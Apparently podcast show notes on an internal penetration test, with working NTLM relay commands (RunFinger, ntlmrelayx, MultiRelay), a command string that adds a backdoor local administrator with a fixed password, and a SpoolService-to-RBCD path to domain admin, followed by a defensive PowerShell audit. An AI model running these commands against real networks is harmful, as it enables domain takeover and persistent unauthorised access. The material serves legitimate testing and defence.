7MS #372: Tales of Internal Pentest Pwnage - Part 5
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute
Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:
- Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
Source: Pwning internal networks automagically
- Ready to pass captured hashes from one host to another? Open responder.conf and set SMB and HTTP to Off, then get Responder running in one window and ntlmrelayx in another. Specifically, I like to use:
ntlmrelayx.py -tf targets.txt
where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c flag to run a command string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
So the full command would be:
ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
This will create a new user called ladmin1, add it to the Administrators group and also to Remote Desktop Users (just in case).
- Want to be more sniper-focused in your hash-passing? Try the MultiRelay tool that ships as part of the Responder kit. You can choose just a target IP and only specific usernames whose hashes to pass. This site has some great examples, but here's an example with one target IP and just the domain administrator accounts from AD:
MultiRelay.py -t 10.0.0.5 -u Administrator brian_admin milton_admin spiderman_Admin
In the end, the relaying didn't work out for me, so I went into "phone a friend" mode and asked other testers for ideas. At this point I have to give a huge thank you to:
- Ryan Haus for his awesome series on penetration testing Active Directory as well as...
- Vincent Yiu for pointing me to this article which gave me the path to domain admin. I'll let you soak in that article as there's a lot of meat in it, but here's the attack path I followed:
Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
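From the blue-team side, the chain above only works when SMB signing is not required on the target, the Print Spooler is running on it, and an RBCD entry can be written to a computer object. Here is an added PowerShell audit (my example, not code from the episode, Responder or impacket) that reports those three conditions; it assumes the ActiveDirectory RSAT module is installed and the session can read local SMB settings and AD computer objects.

```powershell
# Added defender-side audit for the relay path described above (not from the
# episode). Assumes the ActiveDirectory module and an elevated, domain-joined
# session. Returns one record per check so the output can be filtered on Status.
function Test-RelayExposure {
    Import-Module ActiveDirectory -ErrorAction Stop

    # 1. SMB signing: relaying to this host only succeeds if signing is not required.
    $srv = Get-SmbServerConfiguration
    $cli = Get-SmbClientConfiguration
    [PSCustomObject]@{
        Check  = 'SMB signing required (server/client)'
        Value  = "$($srv.RequireSecuritySignature)/$($cli.RequireSecuritySignature)"
        Status = if ($srv.RequireSecuritySignature -and $cli.RequireSecuritySignature) { 'OK' } else { 'FIX' }
    }

    # 2. Print Spooler: the SpoolService trigger needs the service running on the victim,
    #    so on servers that do not print it should be stopped and disabled.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Check  = 'Print Spooler stopped/disabled'
        Value  = if ($spooler) { "$($spooler.Status)/$($spooler.StartType)" } else { 'absent' }
        Status = if ($spooler -and $spooler.Status -eq 'Running') { 'FIX' } else { 'OK' }
    }

    # 3. RBCD: every computer object with msDS-AllowedToActOnBehalfOfOtherIdentity set.
    #    Each entry should map to a known, documented delegation; an unexplained one is
    #    exactly what the final step of the attack path leaves behind.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties PrincipalsAllowedToDelegateToAccount |
        ForEach-Object {
            [PSCustomObject]@{
                Check  = "RBCD entry on $($_.Name)"
                Value  = (($_.PrincipalsAllowedToDelegateToAccount | ForEach-Object { "$_" }) -join ', ')
                Status = 'REVIEW'
            }
        }
}

Test-RelayExposure | Format-Table -AutoSize

# Remediation for checks 1 and 2 (run deliberately, requires elevation):
# Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
# Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
# Stop-Service Spooler; Set-Service Spooler -StartupType Disabled
```

Run it on the domain controllers and file servers first; those are the hosts where a disabled-signing result or a stray RBCD entry matters most.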
Happy testing!